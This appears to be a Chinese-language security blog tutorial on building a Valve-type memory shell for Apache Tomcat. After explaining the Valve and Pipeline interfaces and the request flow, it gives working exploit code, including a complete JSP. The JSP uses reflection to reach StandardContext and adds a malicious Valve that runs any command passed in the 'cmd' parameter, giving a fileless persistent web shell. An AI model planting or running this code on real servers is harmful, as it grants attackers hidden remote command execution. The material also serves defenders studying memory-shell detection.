Tomcat内存马:Valve型

前言#

这一块的关键点还在tomcat的管道机制上，前面在基本知识那里已经写过了，就不多赘述了基本就是一个Context -> Pipeline -> Valve 的层次顺序。我们来看一下几个接口的源码吧，先看看Valve接口的源码。

1
package org.apache.catalina;
2
import java.io.IOException;
3
import javax.servlet.ServletException;
4
import org.apache.catalina.connector.Request;
5
import org.apache.catalina.connector.Response;
6

7
 public interface Valve {
8
  public Valve getNext();
9
  public void setNext(Valve valve);
10
  public void backgroundProcess();
11
  public void invoke(Request request, Response response)
12
  throws IOException, ServletException;
13
  public boolean isAsyncSupported();
14
}

从getNext()指向下一个Valve，我们能够看出来Valve并不是我们想象的那样，是存在Pipline的一个数组元素，而是一个类似于链表的机制。invoke 方法这里是具体操作的实现方法，我们的恶意代码后面就是插在这里的，我们再看一下Pipline接口的源码。

1
public interface Pipeline extends Contained {
2
  public void setBasic(Valve valve);
3
  public void addValve(Valve valve);
4
    public Valve[] getValves();
5
    public void removeValve(Valve valve);
6
    public Valve getFirst();
7
    public boolean isAsyncSupported();
8
    public void findNonAsyncValves(Set<String> result);
9
}

能够看出这里提供了很多关于Vavle操作的方法，我们后面重点关注一下addValve()这个方法，毕竟我们还得靠它来把恶意的Valve给绑到Pipeline上。

流程分析#

因为这个管道机制是发生在处理请求的时候嘛，我们直接在Servlet随便加个断点往前回溯即可跟踪流程，这里看一下调用栈，跟到第一个invoke调用前地方。该部分代码如下，从当前管道的第一个invoke开始链式调用，如果当前的valve已经是当前管道的最后一个valve则调用下一层管道的第一个valve循环往复，直到最后一层管道的最后一个valve被调用，下面随便附上几张图。到这一步，我们的构造思路就已经非常显然了，只要随便把我们的恶意valve插到以上的任意一个管道里面即可。

Exp编写#

恶意Valve#

1
class ValveShell extends ValveBase{
2
    @Override
3
 public void invoke(Request request, Response response) throws IOException, ServletException {
4
        System.out.println("111");
5
 try {
6
            Runtime.getRuntime().exec(request.getParameter("cmd"));
7
 } catch (Exception e) {
8
        }
9
    }
10
}

获取Pipeline对象#

和前文尽量保持思路一致吧，只要能获得到StandardContext就能获得到Pipeline，所以怎么都好说。

1
//获取ApplicationContextFacade类
2
ServletContext servletContext = request.getSession().getServletContext();
3
//反射获取ApplicationContextFacade类属性context为ApplicationContext类
4
Field appContextField = servletContext.getClass().getDeclaredField("context");
5
appContextField.setAccessible(true);
6
ApplicationContext applicationContext = (ApplicationContext) appContextField.get(servletContext);
7
//反射获取ApplicationContext类属性context为StandardContext类
8
Field standardContextField = applicationContext.getClass().getDeclaredField("context");
9
standardContextField.setAccessible(true);
10
StandardContext standardContext = (StandardContext) standardContextField.get(applicationContext);
11
Pipeline pipeline = standardContext.getPipeline();

添加进Pipline#

1
Shell_Valve shell_valve = new Shell_Valve();
2
pipeline.addValve(shell_valve);

完整Exp#

1
<%@ page import="java.lang.reflect.Field" %>
2
<%@ page import="org.apache.catalina.core.StandardContext" %>
3
<%@ page import="org.apache.catalina.connector.Request" %>
4
<%@ page import="org.apache.catalina.Pipeline" %>
5
<%@ page import="org.apache.catalina.valves.ValveBase" %>
6
<%@ page import="org.apache.catalina.connector.Response" %>
7
<%@ page import="java.io.IOException" %>
8
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
9

10
<%
11
    Field reqF = request.getClass().getDeclaredField("request");
12
    reqF.setAccessible(true);
13
    Request req = (Request) reqF.get(request);
14
    StandardContext standardContext = (StandardContext) req.getContext();
15

16
    Pipeline pipeline = standardContext.getPipeline();
17
%>
18

19
<%!
20
    class Shell_Valve extends ValveBase {
21
        @Override
22
        public void invoke(Request request, Response response) throws IOException, ServletException {
23
            String cmd = request.getParameter("cmd");
24
            if (cmd !=null){
25
                try{
26
                    Runtime.getRuntime().exec(cmd);
27
                }catch (IOException e){
28
                    e.printStackTrace();
29
                }catch (NullPointerException n){
30
                    n.printStackTrace();
31
                }
32
            }
33
        }
34
    }
35
%>
36

37
<%
38
    Shell_Valve shell_valve = new Shell_Valve();
39
    pipeline.addValve(shell_valve);
40
%>

运行结果如下